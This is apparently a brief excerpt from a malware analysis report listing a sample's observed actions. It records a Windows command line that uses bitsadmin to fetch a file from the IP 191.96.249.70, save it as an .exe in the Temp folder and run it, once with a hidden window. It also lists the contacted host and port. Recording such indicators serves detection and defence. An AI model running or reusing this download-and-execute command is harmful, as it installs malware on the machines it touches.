Technical Information
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer /download "http://191.96.249.70/confirm.zp" "%LOCALAPPDATA%\Temp/AJdwea.exe" && "%LOCALAPPDATA%\Temp/AJdwea.exe"
- '19#.#6.249.70':80
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer /download "http://191.96.249.70/confirm.zp" "%LOCALAPPDATA%\Temp/AJdwea.exe" && "%LOCALAPPDATA%\Temp/AJdwea.exe"' (with hidden window)
- '<SYSTEM32>\bitsadmin.exe' /transfer /download "http://191.96.249.70/confirm.zp" "%LOCALAPPDATA%\Temp/AJdwea.exe"